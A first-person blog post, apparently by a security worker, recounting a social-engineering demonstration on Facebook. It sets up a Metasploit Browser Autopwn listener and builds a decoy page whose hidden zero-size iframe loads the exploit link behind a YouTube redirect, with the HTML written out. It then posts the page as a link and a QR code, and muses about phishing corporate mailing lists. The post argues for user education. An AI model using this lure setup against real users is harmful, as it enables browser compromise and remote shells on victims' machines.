Recipe for disaster – One Metasploit, One Facebook a dash of iframes and a sprinkle of Social Engineering

I wanted to make a point to someone and show how easy it is to get hacked…
This is how it started, so let me give you a brief understanding on it.

Thread

So in general when you’re on Facebook, you see an article about something, you click on the link and don’t think twice about it. But it’s that simple to get hacked.

You have no idea until it’s too late what that site can do. So to prove this point, I setup a little experiment.

So I fired up Kali Linux and got my metasploit on.

I setup a metasploit listener using Armitage, set the payload to Browser Autopwn then set about the rest of the steps needed.Selection_001

 

Then we wait for a minute while metasploit sets up the listener.

Selection_003

We now have a link ready for us to use. As you can see in the screen-shot above.

So we go to our favorite web hosting provider and make a simple .html file , in this case it’s a surprise.html

Selection_007Open it up and lets edit the file.

So I made this simple file, lets walk through it…

Selection_008

the line that says <meta http-equiv=”refresh” content=”4;url=https://www.youtube.com/watch?v=dQw4w9WgXcQ” />
basically tells the browser to refresh the page in 4 seconds and redirect and load the youtube site.

<body bgcolor=”#000000″> says to make the background black
<img src=images.jpeg> says to load an image file called images.jpeg (I already had uploaded earlier, but you can link to any file)
<iframe src=”http://tiny.cc/XXXXXXXXXX” height=0 width=0 ></iframe> and this is where the magic happens. This says to create an iframe, with a height of 0 and a width of 0. The URL has been shortened using tiny.CC

So when we look at the site , people will only see the image we put there.

Selection_005

So we now have a metasploit listener waiting, we have a website up and ready to spit out our tiny.CC url and a redirect to make people think the youtube video was the trick.

One thing we need to do now is port forward to our waiting metasploit session…
Selection_010

 

At this point we are ready to roll 😉

So we pop over to our best social networking site and we post a “social experiment” …..

Selection_004

Or we post over a QR code
Selection_009

Then we sit, and we wait and we think, really ? nah, no one will click on it, c’mon who would ….

Selection_012

ah …..

So we see that , actually people do click on these links when they have no idea what those links do… ah man..
This is why my InfoSec job is hard work, trying to defend against this, how do we stop people clicking ?

Anyways we pop back over to facebook and we post an update ….

Selection_014

And it’s that simple, you could at this point have a meterpreter shell on 1,2,3,4,5 peoples box … 1000’s if you hide this on a large popular website!!
What about popping it in a phishing email and sending it to a corporate DL ?

This leads us to think about how dangerous iframes can be, how hard it is to defend against social engineering and how important user education is…
This type of education needs to start at the school level… the seed needs to be sowed and lessons need to be taught on security.
In this day and age, security is no longer an after thought!

Anyways, can you guess what the youtube video was ……

 

Selection_013 DISCLAIMER: The site i created is now dismantled, was hosted by me on one of my own domains, the people that clicked were my friends and family not a member of the general public and were spoken to after.